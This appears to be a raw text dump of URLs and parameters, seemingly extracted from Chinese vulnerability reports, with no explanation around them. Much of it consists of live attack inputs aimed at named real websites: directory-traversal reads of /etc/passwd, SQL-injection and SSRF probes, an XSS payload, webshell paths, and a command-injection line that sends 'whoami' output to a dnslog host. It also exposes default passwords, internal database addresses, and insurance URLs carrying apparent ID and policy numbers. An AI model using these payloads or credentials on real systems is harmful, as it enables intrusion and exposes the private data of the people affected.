https://github.com/dingquantracy/dingquantracy.github.io/blob/d5509aa19a6c75e36a8c7a3c14e5b970233d8806/a.txt www.lufax.com www.lu.com www.lufax.com www.lu.com www.lu.com www.lu.com www.lu.com www.lu.com www.lu.com www.lufax.com www.lu.com www.lu.com http://s9159331849.kuaizhan.com/ 
http://s9159331849.kuaizhan.com/shop/commodity/VzIJ_VfWPg_mwAv_ data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg== data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg== http://long.gamebean.com/game_enter.php?s_id=1 http://long.gamebean.com/game_enter.php?s_id=1 http://sqlmap.org http://www.gamebean.com/login.php?ref=long.gamebean.com/dnslist.php http://**.**.**.**/ http://**.**.**.**.cn/ecommerce/proposal/xueping/xuePingController/downloadClause?fileName=..%2FWEB-INF%2Fweb.xml http://www.qu.cn/ http://s.qw.cc/app/mobile.apk?v=339 http://app.a.qu.cn/commentslist/561.html http://app.a.qu.cn/commentslist/561.html http://app.a.qu.cn/commentslist/561.html http://app.a.qu.cn/Ajax/getNewsComment.html http://sqlmap.org http://**.**.**.**:8013/console/ http://**.**.**.**:8013/f/test1.jsp http://**.**.**.**:8013/console/ http://rap.weibo.cn/account/doLogin.do AS:2048 AS:2048 AS:2048 AS:2048 http://**.**.**.**/mkjts/ http://**.**.**.**/MKJSJ/ https://ebank.cbhb.com.cn/webappservice/TP050102.do?FileName=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd http://api.m.qu.cn/common/uploading http://**.**.**/ http://**.**.**/1.jsppwd=023&i=ifconfig_ Bcast:168.3.23.2***** feaa:73***** https://vpn.le.com/ https://github.com/xydaxia0/letv-pay-international-scheldule/blob/faa1883e4fc8d9b9ff1fcd67ad0149d72b6698a5/scheldule-server/target/scheldule-server-1.0-SNAPSHOT/WEB-INF/classes/email.properties https://vpn.le.com http://**.**.**.**/index.do http://**.**.**.**/news.do?id=2cd178daff504790a3c1baf2108db446 http://**.**.**.**/news.do?id=2cd178daff504790a3c1baf2108db446%bf'and-- http://**.**.**.**/news.do?id=2cd178daff504790a3c1baf2108db446 http://**.**.**.**/news.do?id=2cd178daff504790a3c1baf2108db446%bf'and-- http://**.**.**.**/website.do?service=&area=&page=4 http://**.**.**.**/jycs-index.do?learncenter_id=0982d2ac9663437e8c87acf0218e934e http://**.**.**.**/news-page.do?id=c490e04322484533bb3521bf09125d72 
http://**.**.**.**/news-page.do?id=c490e04322484533bb3521bf09125d72%bf'and-- http://59.56.25.29/zabbix http://union.app.sogou.com/index.php/aa.php?s=/Index/login http://sqlmap.org http://**.**.**.**/ http://wooyun.org/bugs/wooyun-2010-0205478 https://api.quyiyuan.com/ms-news/v1/news?newsType=PIC*&pageSize=3&publicServiceType=050000&requestSource=web&serviceType=050000&start=0&token=20160523024254&userSource=0 http://fenqi.pingan.com.cn/pafenqi/ums/umsUser!loginEdit.do http://fenqi.pingan.com.cn/pafenqi/h5/pages/forgetPwd.jsp?mark=1 http://chexian.sinosig.com/unManage/unAgent_forwardUnAgentLogin.action http://oa.fun.tv/seeyon/services/personService?wsdl http://oa.funshion.com/seeyon/services/personService?wsdl http://oa.fun.tv/seeyon/services/authorityService?wsdl http://oa.funshion.com/seeyon/services/authorityService?wsdl http://115.28.28.109/ http://115.28.28.109/api/ad.php?id=12&catid=&name= http://oa.juneyaoair.com//services/ http://oa.juneyaoair.com//services/MobileService SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/ xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/ xmlns:xsd="http://www.w3.org/1999/XMLSchema xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance xmlns:m0="http://tempuri.org/ xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/ SOAP-ENV:Header/ SOAP-ENV:Body SOAP-ENV:Body SOAP-ENV:Envelope http://www.ntjxt.com http://www.ntjxt.com/areas/result?news_title=十一五&area=10&type=1 http://www.ntjxt.com/areas/result?news_title=十一五% http://www.ntjxt.com/areas/result?news_title=十一五% http://**.**.**.**/zzcx/zhiliang/index.htm http://**.**.**.**/zzcx/zhiliang/chaxun.aspx https://mail.ceair.com/owa/ admin:admin http://m.sinosig.com/mobile/index/index!passwordSmsVerify.action AS:2048 AS:2048 AS:2048 AS:2048 http://**.**.**.**:7003/uddiexplorer/cc.jsp MobileGameServices.asmx/GetChannelCodeByProductId http://syjf.data.99.com http://222.190.108.19/addVendorsAction http://mail.new.55bbs.com/ 
http://**.**.**.**:8083/active/appmodel.action?cn=0&id=50 http://**.**.**/trade/pay/init.doorderId=8341605257418002 coding:utf-8 index.php/index/logout?s=/Index/login http://union.app.sogou.com/ http://**.**.**.**/themis-web/getYearsAction.action http://218.17.224.215:8082/obj/Debug/SFWCFService.dll http://sys.boyibang.com/index.php?s=/Knowledge/postsList/ended/2016-05-28/p/2.html jdbc:oracle:thin:@**.**.**.**:1521:zjhxcs http://bbs.biligame.com/config/config_global.php~ https://vpn.le.com/ http://www.lecommons.com/portal/letv http://us.i.shop.letv.com/ http://ht.letv.cn/ http://10.181.153.72:28080/search1/search.do http://release.letv.cn/user/login.do# http://statistics.letv.cn/ http://aws.leshiren.cn/ http://107.155.53.144/ http://deploy.letv.cn/ http://jira.letv.cn/ http://wiki.letv.cn/ http://cm.letv.cn/ http://10.140.60.134/phpmyadmin/ http://cd.letv.cn/ http://svn2.letv.cn/ http://npm.letv.cn/ http://crowd.letv.cn/ http://svn2.letv.cn/tp/ http://svn2.letv.cn/tp/lecloud/bs/off/trunk/offline/blacklist http://ci.letv.cn/ http://svnweb.letv.cn/ http://prj.letv.cn/ https://github.com/edge-security/edge_mail/blob/07fb54367949a66855c9be4597c04f29466737c4/mlogin.py http://**.**.**.**:7001/defaultroot/login.jsp http://**.**.**.**:7001/defaultroot/xfservices/GeneralWeb www.7gz.com www.7gz.com http://211.100.30.93:8080/axis2 http://211.100.30.93:8080/axis2/she.jsp http://**.**.**.**/ http://**.**.**.**/newjsp/Self_check_report.jsp?style=u4|2 jdbc:oracle:thin:@**.**.**.**:1521:orcl jdbc:mysql://localhost:3306/dtwb?useUnicode=true&characterEncoding=UTF-8&autoReconnect=true&failOverReadOnly=false&maxReconnects=10 http://www.safedog.cn/?a=/*&ArticleID=17329%20union%20select%20xxx%20from%20%20xxx&b=  http://www.safedog.cn/?a=/*&ArticleID=17329%20union%20select%20xxx%20from%20%20xxx&b=*/ http://**.**.**.**/index.action http://**.**.**.**/EmerWS/login.action https://xen.sinosig.com/vpn/index.html http://wenku.baidu.com/view/571385ee7e21af45b307a8de.html?from=search 
http://wenku.baidu.com/link?url=ud2G-ndGymOXuExmfy2jiUN9E2cGwIfbvX-rDGydAsE9VIqnkySP4KgBII51Zqa2lGY3AC3M81ZM6Zv8LbIAveP_JdmzvoyiBwAeU0OD8Fi http://pan.baidu.com/share/home?uk=3257785095#category/type=0 http://**.**.**//club_register.phpact=check_username&username=aa http://www.oppodigital.com.hk//club_register.php?act=check_username&username=aa http://cms.263.net/ http://cms.263.net/queryContactInfo?ID=37582 http://cms.263.net/control-queryManagerById?magID=478 http://cms.263.net/control-updateManager http://122.113.39.236:8090/ http://zhanzhang.baidu.com/mf/index?site=http://baidu.com user:sys_yzgl http://**.**.**.**/news.do?id=5adbc18f2f2142b8af81e8a28a43fbe7&curCol=newsA_trends http://**.**.**.**/news.do?id=5adbc18f2f2142b8af81e8a28a43fbe7&curCol=newsA_trends http://**.**.**.**/index.html http://h5.jd.com/misc/script/common/?js=../../../../../../../../../../../../../sbin/../etc/././passwd%00f.js http://h5.jd.com/misc/script/?js=../../../../../../../../../../../../../sbin/../etc/././passwd%00f.js http://**.**.**/ http://account.mama.yx.sogou.com:80/account/User/register.do http://fanyi.youdao.com/WebpageTranslate?keyfrom=webfanyi.top&url=http%3A%2F%2F10.100.21.7&type=EN2ZH_CN http://10.100.21.7.xip.io http://www.10.100.21.7.xip.name http://t.im/14tjq http://**.**.**.**/ http://appapi.yc.ifeng.com/web/qy_user.php?a=points_for&auth=c30693d825&ct=iOS&output=json&points=-19&srcid=fenghuang&t=1464570813&token=2157421639&uid=5892933&v=1 http://yuba.douyu.com http://yuba.douyu.com/url/scrapy http://www.baidu.com http://hnc.huawei.com/ http://hnc.huawei.com/web/downloadAction!download.do?relativePath=http://127.0.0.1:22&fileName=123.txt http://service.weibo.com http://service.weibo.com/share/share.php?appkey=872034675&content=utf-8&url=http://fuzz.wuyun.org/hello?world&title=wyssrf&pic= https://vpn.caissa.com.cn/por/login_psw.csp?rnd=0.16235555938372026#https%3A%2F%2Fvpn.caissa.com.cn%2F http://www.github.com 
http://**.**.**.**:8080/emallTelOmsWeb/sysmgr/login/login.action www.welltang.com http://118.194.40.105/ http://service.tools.medlive.cn/drugref/drugref/drug_info.do?id=12850 http://club.youku.com/ https://220.178.49.222 http://app.airchina.com.cn下载“高管驾驶舱” cn:8001 http://**.**.**/ http://**.**.**/bea_wls_internal/1.jsp jdbc:oracle:thin:@10.106.0.13:1521:tclcss http://**.**.**.**:8089/../../../../../../../../etc/passwd http://**.**.**.**/%c0%ae/WEB-INF/web.xml http://css.tclac.com/console/login/LoginForm.jsp http://css.tclac.com/jspspy/jspspy.jsp http://60.28.217.180:8040/ http://**.**.**.**/,想说像这种站应该安全防护会很不错,毕竟涉及到定位什么的但是简单看了一下,感觉网站本身做的好像并不怎么样,当然现在只是感觉,要不证实一下? http://**.**.**.**/login.jsp http://mail.anyolife.com/jsoa/login.jsp http://123.126.34.82:7777/ http://123.126.34.82:7777/ca/ma3.jsp jdbc:oracle:thin:@192.168.7.19:1521:orcl http://120.27.81.219:8080/api/ms-guide/v1/hospitals/departs/real?APPOINT_SOURCE=0&APP_UUID=4ea0bb0a-cb21-4848-98b5-8ee4c77a6036&CHANNEL_ID=1&cityCode=123&diseaseName=天花&hospitalID=&IMEI_ID=7505363B-8438-435F-8917-85C3BBD19D17&isLogin=true&juniorCode=11&juniorName=感染科|&loc=c&operateCurrent_UserId=11299681&operateUserSource=0&opVersion=2.2.01&PHONEOPERATINGSYS=2&PHONETYPE=iPhone8,1&PHONEVERSIONNUM=9.3.2&provinceCode=0&PUBLIC_SERVICE_TYPE=0&QY_CHECK_SUFFIX=d1f4d23a30fed8f7aa9a8a2a2d30f457&USER_ID=11299681&USER_VS_ID=14374450 jdbc:oracle:thin:@**.**.**.**:1521:devdb http://i.liebao.cn/index.html http://**.**.**/ http://**.**.**/index/indexTest.jsp http://**.**.**/cacti/plugins/weathermap/editor.php http://**.**.**/cacti/plugins/weathermap/configs/wooy1n.php http://www.kaixin001.com/set/logo.php http://api.medlive.cn/user/get_push_info.php?apns_token=a1d0a3407e068cee108b0072e8dcdab36bf7e05ce542a3fbf7b3794b3bfe3da5&appid=com.kingyee.medlive.iphone&device_type=apple&device_version=9.3.2&medlive_user_id=2561346&token=689238C8-AD5C-40AD-9FA5-4512800145C6&version=3.2.1 http://**.**.** http://**.**.**/bea_wls_internal/1.jsp http://jf.cmbchina.com 
http://jf.cmbchina.com/RMA/RMADetailContent.aspx?sysno=852550&Item=192228&action=show http://jf.cmbchina.com/RMA/RMADetailContent.aspx?sysno=852450&Item=192228&action=show http://jf.cmbchina.com/RMA/RMADetailContent.aspx?sysno=852449&Item=192228&action=show http://jf.cmbchina.com/RMA/RMADetailContent.aspx?sysno=852446&Item=192228&action=show http://202.198.17.226:8088/oa/index.php http://www.towabank.co.jp/index.asp http://www.towabank.co.jp/index.asp jdbc:oracle:thin:@**.**.**.**:1521:orcl http://passport.feng.com/index.php?r=user/register https://github.com/siming1022/ems-dataload/blob/d283c3c76a2b42737214d10821831b7ecf9c58cf/ems-dataload-consumer/src/main/resources/dataSource.xml http://i.youku.com/u/setting/base_avatar.html http://i.yonyou.com,造成信息泄露 http://permalink.gmane.org/gmane.comp.security.oss.general/19669 jdbc:oracle:thin:@**.**.**.**:1521/orcl http://**.**.**.**/eOrder/getOrderList.action http://control.blog.sina.com.cn/admin/article/article_add.php xxxxx.dnslog.link/?whoami=`whoami http://vi.travel.sina.com.cn/vision/upload.php http://**.**.**.**/ http://**.**.**.**/browser.jsp?u=wanyong http://**.**.**.**/helpss.jsp http://**.**.**.**/test.txt http://club.news.sina.com.cn/post.php?action=newthread&fid=11 http://my.oschina.net/u/2393235/blog/684599 http://www.jkwin.com.cn/ams/pages/web/findpwd/findpwd1.jsp2 http://211.150.65.47:40001 http://211.150.65.47/ens/cssroot.jsp http://wooyun.org/bugs/wooyun-2010-0205600 http://zhaopin.kaixin001.com/yingcai/personal.php?jid=113&come_from=3&isupdate= http://blog.knownsec.com/2016/05/imagemagick-popen-remote-command-execution-vulnerability/ http://www.oppo.com/ http://store.oppomobile.com/ http://zhushou.oppo.com/ http://yun.oppo.com/login http://www.oppo.cn/ http://www.coloros.com http://**.**.**.**/manage/admin.aspx http://www.dtdream.com/pub/e_card/00001.html http://monitor.dtdream.com http://pms.dtdream.com/coop/login/loginProcess/ http://pms.dtdream.com/test.php 
http://www.atime.co.jp,存在注入的网址:http://www.atime.co.jp/shop.php?sid=1 http://www.atime.co.jp/shop.php?sid=1 www.jkwin.com.cn http://www.jkwin.com.cn/ystpatient2.3/part.do?method=getJbPageByPartId&true=doJsonp_cfcc9621_553d_46cb_8b7b_909f8f148fd9&pageNo=1&partId=2&searchStr=-1&functionName=doJsonp_cfcc9621_553d_46cb_8b7b_909f8f148fd9&_=1464676214454 http://**.**.**.**/login.do http://**.**.**/album/h/xinQingViewid=8&device=&user_id=418923 http://drops.wooyun.org/papers/15589 http://blog.knownsec.com/2016/05/imagemagick-popen-remote-command-execution-vulnerability/ http://open.wandoujia.com/account/info http://app.finance.ifeng.com/wgsearch/index.php?code=600234&begin=2016-03-05&end=2016-05-31&organ=中国证券监督管理委员会 http://2.fengniao.com/goods/add?cate_id=115&subcate_id=1057&brand_id=0&model_id=0&modelseries_id=0&type=0&_confirm=1 https://wm.cib.com.cn http://yin.fengniao.com/?do=Create/Calendar&type=2#4020 http://yin.fengniao.com/?do=Ajax/Calendar&a=fileUpload&productId=2&productionId=4020 http://store.highglass.cn/index.php/admin/orders/orderinfo/ordercode/HJ20160531TXNBI.html http://store.highglass.cn/index.php/admin/index/index.html http://store.highglass.cn/index.php/admin/orders/orderinfo/ordercode/HJ20160531TXNBI.html http://**.**.**.**/si/portal/register.jsp http://**.**.**.**/login https://zhangdan.**.**.**.**/sessions/new?service=http%3A%2F%2Fzhangdan.**.**.**.**%2F http://slide.toutiao.com/提供给开发者开发自己的模板,然后上传发布给其他人使用 http://slide.toutiao.com/preview/desktop/574c268cefcd450333315c57 https://**.**.**.** http://www.cet.sgcc.com.cn/sites/zdzb/contentCritic.jsp POST:ChildWebID=zdzb&currPage=1&pageSize=15 http://www.benhayak.com/2015/06/same-origin-method-execution-some.html。我的例子在chrome下只要访问我的页面就中招,不用再点一次去绕过chrome的popup http://weibo.com/ajaxlogin.php?framelogin=1&callback=window.opener.method http://weibo.com/277634777 
http://weibo.com/ajaxlogin.php?framelogin=1&callback=window.opener.document.body.firstElementChild.firstElementChild.firstElementChild.nextElementSibling.firstElementChild.firstElementChild.firstElementChild.firstElementChild.firstElementChild.firstElementChild.nextElementSibling.firstElementChild.nextElementSibling.nextElementSibling.nextElementSibling.firstElementChild.firstElementChild.firstElementChild.click http://www.e-chinalife.com/product/benefitshow/indexlis.jsp?RiskCode=415 http://www.e-chinalife.com/product/benefitshow/suggest/downloadToHTML.jsp?Path=/..\downloadToHTML.jsp&titleDoc=1 http://www.jkwin.com.cn/ams/logon.do?method=activMobile&userId=1 http://www.jkwin.com.cn/ams/logon.do?method=activMobile&userId=89720 http://www.jkwin.com.cn/ams/logon.do?method=activMobile&userId=89721 http://www.jkwin.com.cn/ams/logon.do?method=activMobile&userId=89722 http://www.jkwin.com.cn/ams/logon.do?method=activMobile&userId=100282 http://xinpan.zzhz.zjol.com.cn/djgfczx/ http://xinpan.zzhz.zjol.com.cn/faqcont.zzhz?param=doSelect http://xinpan.zzhz.zjol.com.cn/images/faq/mian.html http://bangong.xcar.com.cn/Admin/index.php?s=/Public/login http://pan.baidu.com/share/home?uk=3257785095#category/type=0 http://pan.baidu.com/s/1cFRWJk http://www.69xiu.com/rank http://111.202.107.86:8080/ http://111.202.107.86:8080/user/gang.hu/configure http://111.202.107.86:8080/user/wangze/configure www.welltang.com http://share.v.t.qq.com http://share.v.t.qq.com/index.php?c=share&a=pageinfo&url=http://wuyun.org http://share.v.t.qq.com/index.php?c=share&a=pageinfo&url=http://fuzz.wuyun.org:22 http://share.v.t.qq.com/index.php?c=share&a=pageinfo&url=http://www.baidu.com www.baidu.com\/img\/baidu_sylogo1.gif"],"title":"\u767e\u5ea6\u4e00\u4e0b\uff0c\u4f60\u5c31\u77e5\u9053 http://share.v.t.qq.com/index.php?c=share&a=pageinfo&url=http://fuzz.wuyun.org:8888 http://www.ecaic.com:8070/cardactiverenshen/prpCmainAction.do?action=printPrpCmainContent&prpCmainCode=627572014400080503641 
http://www.ecaic.com:8070/cardactiverenshen/prpCmainAction.do?action=printPrpCmainContent&prpCmainCode=627572014400080503642 http://www.ecaic.com:8070/cardactiverenshen/prpCmainAction.do?action=printPrpCmainContent&prpCmainCode=627572014400080503642 http://www.ecaic.com:8070/cardactiverenshen/prpCmainAction.do?action=printPrpCmainContent&prpCmainCode=627572014400080503643 http://www.ecaic.com/EbsWeb/getMyInsurance.do?UIAction=detailedCheckNew&policyNo=605012014320721000090&printNo=320721198507021814&flag=%CD%F8%C2%E7%B2%E9%D1%AF&ip=10.0.253.2&quarter=1 http://www.ecaic.com/EbsWeb/getMyInsurance.do?UIAction=ClaimQueryListNew&type=queryClaim&policyNo=605012015350000000161&printNo=350126197611062712&flag=%CD%F8%C2%E7%B2%E9%D1%AF&ip=10.0.253.2&quarter=1 http://www.ecaic.com/EbsWeb/getMyInsurance.do?UIAction=detailedCheckOld&policyNo=605072014330314001508&printNo=412724198612068350&flag=%CD%F8%C2%E7%B2%E9%D1%AF&ip=10.0.253.2&quarter=2 http://www.ecaic.com/EbsWeb/getMyInsurance.do?UIAction=accidentstrongProposalOld&policyNo=628082015370708006901&printNo=370728196807303666&flag=%CD%F8%C2%E7%B2%E9%D1%AF&ip=10.0.253.2&quarter=2 http://www.ecaic.com/EbsWeb/getMyInsurance.do?UIAction=detailedCheckNew&policyNo=605072015370785001454&printNo=370727197404028119&flag=%CD%F8%C2%E7%B2%E9%D1%AF&ip=10.0.253.2&quarter=2 https://github.com/Vonwey/oa.com/blob/69e8e9a7ee0c5e60097dc568d00f9a92b41c4355/app/config/development/mail.yaml http://61.233.8.174:7002 http://61.233.8.174:7002/console/ jdbc:oracle:thin:@172.24.3.31:1521:cmmsdb1 http://182.92.82.171:8088/seeyon/index.jsp http://182.92.82.171:8088/seeyon/services/authorityService?wsdl http://182.92.82.171:8088/seeyon/services/personService?wsdl http://game.weibo.com http://game.weibo.com/webgame/ajax/pajaxGetServersList?callback=callback1&appid=3031123572&_=1464667300888 ip:42.96.131.200 http://www.miui.com/forum.php?mod=ajax&action=downremoteimg&message=[img]http://fuzz.wuyun.com/302.php?data=helo.jpg[/img 
http://www.miui.com/forum.php?mod=ajax&action=downremoteimg&message=[img]http://fuzz.wuyun.com/302.php?s=dict%26ip=fuzz.wuyun.com%26port=8080%26data=helo.jpg[/img http://fss.medlive.cn/?ac=check&type=email&email=* http://dic.medlive.cn/common/ajax.inc.php http://refer.medlive.cn/common/ajax.inc.php http://mbsjt.medlive.cn/sci/searchCourse/more-course http://manhua.weibo.com/space/upload_comic http://www.dgguoyao.com http://www.dgguoyao.com/show.asp?id=228 http://www.dgguoyao.com/zibu2.asp?id=567 http://www.dgguoyao.com/xiazai.asp?anclassid=30 http://www.dgguoyao.com/heshow.asp?id=628 http://appzd.zxzx.stcn.com/admin/admin/adminLogin.do http://cos.sto.cn/login/Login.jsp?logintype=1 http://cos.sto.cn/services/ http://cos.sto.cn/services/MobileService?wsdl http://www.4008118228.cn/index.shtml http://www.4008118228.cn/Editor/filemanager/browser/default/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=&CurrentFolder=/../ http://www.4008118228.cn/Editor/filemanager/browser/default/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=&CurrentFolder=/../Include/ http://www.doc88.com/p-9038154069569.html http://git.747.cn/users/sign_in http://git.747.cn/zhangxuan/heimilink_api/blob/master/heimi_api%20interface.txt http://miyu.apps.ibaihe.com/user/update http://www.jkwin.com.cn/ams/pages/web/register.jsp http://www.jkwin.com.cn/ams/pages/web/findpwd/findpwd1.jsp http://www.camera360.com/ url:http://125.210.141.30:8080/manager/html user:admin pass:123456 http://125.210.141.30:8080/nettv/ https://aq.qq.com/cn2/manage/mobile/confirm_number_sel?source_id=2849%C2%A0 https://console.qcloud.com/ http://www.i21st.cn/u/forgetpassword_w.php www.jkwin.com.cn http://www.jkwin.com.cn/ystpatient2.3/callR.do?functionName=doJsonp_f4bc5edb_8efe_4724_9b24_62ce7b52b552&method=getQuery&patientId=1&patientName=%E8%8B%8F%E8%81%94&true=doJsonp_f4bc5edb_8efe_4724_9b24_62ce7b52b552&_=1465190257502 
http://www.jkwin.com.cn/ystpatient2.3/callR.do?method=getQuery&true=doJsonp_f4bc5edb_8efe_4724_9b24_62ce7b52b552&patientId=5577546766&patientName=%E8%8B%8F%E8%81%94&functionName=doJsonp_f4bc5edb_8efe_4724_9b24_62ce7b52b552&_=1465190257502 www.jkwin.com.cn https://github.com/joejiaogithub/repo_gionee_meet/blob/9915900effad0ace3917e62a242b0a0515006cc1/meeting/src/meet/you/MainActivity.java http://182.18.63.104:82/login.php?action=login http://www.jkwin.com.cn/ams/sso.do?ticket=FA1FAB154D1F4F83B24F409864994CB3&logonAcct=1 http://www.jkwin.com.cn/ams/logon.do?method=register http://tjat.damai.cn/phpstat.tar.gz jdbc:oracle:thin:@**.**.**.**:1521/rtdb http://**.**.**/iecrs/ http://**.**.**/bea_wls_internal/ceshi.jsp jdbc:oracle:thin:@localhost:1521:orcl http://m7lrv.blog.expnet.cn http://www.tangscan.com/plugins http://wx.jumei.com/User/doBind http://**.**.**.**/papers/64)的有如下3个: http://**.**.**.**/login/login.jsp http://**.**.**/_ http://fight.gamebbs.qq.com http://qqhx.gamebbs.qq.com http://bbs.digi.qq.com http://bbs.write.qq.com http://ff.gamebbs.qq.com http://bbs.baby.qq.com http://myhn.qq.com http://bbs.e.qq.com http://tpai.qq.com http://bbs.fanli.qq.com http://bbs.house.qq.com http://xia.gamebbs.qq.com http://bbs.cb.qq.com http://bbs.ac.qq.com http://club.auto.qq.com http://bbs.open.qq.com http://shouyou.qq.com http://bbs.im.qq.com http://qqbattle.gamebbs.qq.com http://nz.gamebbs.qq.com http://xx.gamebbs.qq.com http://xb.gamebbs.qq.com http://bbs.m.qq.com http://forum.discuz.qq.com http://bbs.cd.qq.com http://myln.qq.com http://ktv.gamebbs.qq.com http://gf.gamebbs.qq.com http://bbs.xian.qq.com http://gamebbs.qq.com http://ppjz.gamebbs.qq.com http://dm.gamebbs.qq.com http://ffo.gamebbs.qq.com http://sg.gamebbs.qq.com http://xb.qq.com http://bbs.zt.qq.com http://mygd.qq.com http://xj.gamebbs.qq.com http://xb.qq.com:8080 http://bbs.gj.qq.com http://bbs.vip.qq.com http://bbs.sports.qq.com http://bbs.weiqi.qq.com http://lol.gamebbs.qq.com http://bbs.finance.qq.com 
http://d2.gamebbs.qq.com http://fs.gamebbs.qq.com http://myfj.qq.com http://mysh.qq.com http://ch.gamebbs.qq.com http://qqxy.gamebbs.qq.com http://codol.gamebbs.qq.com http://ava.gamebbs.qq.com http://fo.gamebbs.qq.com http://bbs.lol.qq.com http://wang.gamebbs.qq.com http://bbs.games.qq.com http://bbs.omd.qq.com http://tps.gamebbs.qq.com http://tiantang2.gamebbs.qq.com http://qqgame.gamebbs.qq.com http://bbs.yun.qq.com http://yl.gamebbs.qq.com http://bbs.wifi.qq.com http://bns.gamebbs.qq.com http://nba2k.gamebbs.qq.com http://bbs.blog.qq.com http://r2.gamebbs.qq.com http://bbs.open.t.qq.com http://ld2.gamebbs.qq.com http://yu.gamebbs.qq.com http://qgamepailei.gamebbs.qq.com http://hao.wsq.qq.com http://c9.gamebbs.qq.com http://ss.gamebbs.qq.com http://hxsj.gamebbs.qq.com http://bbs.xg.qq.com http://x52.gamebbs.qq.com http://bbs.book.qq.com http://9j.gamebbs.qq.com http://speed.gamebbs.qq.com http://djt.qq.com http://qyzs.gamebbs.qq.com http://bbs.auto.qq.com http://myhb.qq.com http://code.qq.com http://bbs.tech.qq.com http://wf.gamebbs.qq.com http://daoju.gamebbs.qq.com http://qqbaby.gamebbs.qq.com http://dzs.gamebbs.qq.com http://bbs.lady.qq.com http://bbs.kid.qq.com http://bbs.browser.qq.com http://dnf.gamebbs.qq.com http://s3.gamebbs.qq.com http://sl.gamebbs.qq.com http://woz.gamebbs.qq.com http://bbs.edu.qq.com http://bbs.fj.qq.com http://qqtang.gamebbs.qq.com http://xxz.gamebbs.qq.com http://bbs.pcmgr.qq.com http://myxian.qq.com http://xiaoyuan.qq.com http://mycd.qq.com http://cf.gamebbs.qq.com http://ug.qq.com http://myzj.qq.com http://bbs.meishi.qq.com http://bbs.astro.qq.com http://7.gamebbs.qq.com http://3366.gamebbs.qq.com http://meng.gamebbs.qq.com http://baoshi.gamebbs.qq.com http://bbs.guanjia.qq.com http://mo.gamebbs.qq.com http://bbs.cf.qq.com http://bbs.gd.qq.com http://bbs.comic.qq.com http://vr.qq.com http://mycq.qq.com http://tiantang.gamebbs.qq.com http://bbs.map.qq.com http://cheng.gamebbs.qq.com http://tnt.gamebbs.qq.com http://myhenan.qq.com 
http://xy.gamebbs.qq.com http://h2.gamebbs.qq.com http://bbs.show.qq.com http://bbs.wan.qq.com http://bbs.ent.qq.com http://qqsh.gamebbs.qq.com http://mama.kid.qq.com http://bbs.cq.qq.com http://bbs.qt.qq.com http://age.gamebbs.qq.com http://bbs.fashion.qq.com http://bbs.v.qq.com http://bbs.mail.qq.com http://bbs.ms.qq.com http://pet.gamebbs.qq.com http://bl.gamebbs.qq.com http://bbs.hb.qq.com http://x.gamebbs.qq.com http://bbs.tgp.qq.com http://hon.gamebbs.qq.com http://jh.gamebbs.qq.com http://zg.gamebbs.qq.com https://xb.qq.com http://9.gamebbs.qq.com http://bbs.shang.qq.com http://ye.gamebbs.qq.com http://bbs.news.qq.com http://bbs.qa.qq.com http://bbs.chuangshi.qq.com http://x5.gamebbs.qq.com http://120.236.166.135:3333/uploads/uploads.tar http://113.108.100.142/weballiance/cooperateCode!goSearchDemo255_300.action http://222.187.127.174:8081/ github:https://github.com/huacnlee/carrierwave-aliyun/blob/1a61840a44a66c8fc3da9ce908b4f94b4a8cd187/spec/spec_helper.rb http://218.29.137.248:7001/ http://218.29.137.248:7001/bea_wls_internal/1.jsp http://218.17.205.91:7003/page/frame/login.jsp http://218.17.205.91:7003/manager/html http://218.17.205.91:7003/is/index.jsp http://218.17.205.91:7003/is http://218.17.205.91:7003/is/index.jspx http://218.17.205.91:7003/is/test.jsp?o=vLogin khbslx:K,khbs:005144,jymm:111111,xjymm:111111,wldz khbslx:K,khbs:005144,jymm:111111,mode:,wldz khbslx:CUST,khbs:012540 khbslx:CUST,khbs:012540,zqbslx:,zqbs:,gdms:,cxlx khbslx:K,khbs:012540,zqbslx:,zqbs:,htxh:,gdms:1,cdms:1 khbslx:K,khbs:012540,zqbslx:,zqbs:,htxh:4315265,gdms khbslx:K,khbs:005144,htxh:,cxms zjzh:005144 khbslx:K,khbs:018324,gdms:2,zqbslx:,zqbs:,qsrq:2001-01-01,zzrq:2008-09-01,cxts:0 khbslx:K,khbs:012540,gdms:2,zqbslx:,zqbs:,htxh:1,qsrq:2008-01-01,zzrq:2008-09-01,cxts:0 khbslx:K,khbs:012540,gdms:2,zqbslx:,zqbs:,htxh:1,qsrq:2008-01-01,zzrq:2008-09-01,cxts:0 khbslx:K,khbs:005144,gdms:,jysdm p_gybh:1,p_gnbh:28104201,p_czzd:1,p_kzcs:,p_gymm:AEIFCAJEOIACHCGCCGLI,wjbh:- 
sfmb:1,dwbh:-1,qsjzrq:19900101,zzjzrq:20201231,wjzt:,wjlx:-1,sfxypf:,zxwts:-1,zdwts:-1,zxwjzf:-1,zdwjzf:- ksrq:19900101,jsrq:20201231,sfgl:-1 oper_type:1,lsh:1696,desip:127.0.0.1,file_name:filename oper_type:1,lsh:1696,file_name:filename p_gybh:1,p_gnbh:14290040,p_czzd:,p_kzcs:,p_gymm:,bzbh:-1,fzzt:-1 p_gybh:1,p_gnbh:40418510,p_czzd:127.0.0.1,bh:8,p_gymm:AEIFCAJEOIACHCGCCGLI,p_kzcs:,istmp:1,lsh:101,tsl field_int01:1,field_int02:1,field_int03:1,field_int04:1,field_int05:1,field_int06:1,field_int07:1,field_int08:1,field_int09:1,field_i qsrq:20100910,tjlx:3,p_czzd:127.0.0.1,zzrq:20100910,PageCount:25,p_kzcs:,isPerPage:true,hjlx:- PageOffset:0,p_gybh:1,p_gnbh:14250010,ygbhlx:1,dfhm:,mtlx:-1,p_gymm:AEIFCAJEOIACHCGCCGLI,khbh:- p_gybh:1,p_gnbh:40418401,p_czzd:127.0.0.1,bh:8,p_gymm:AEIFCAJEOIACHCGCCGLI,p_kzcs sjlySQL:select kzbs:d,bz:d,p_kzcs:,p_gybh:1,p_gnbh:19100002,p_czzd:127.0.0.1,p_gymm:AEIFCAJEOIACHCGCCGLI 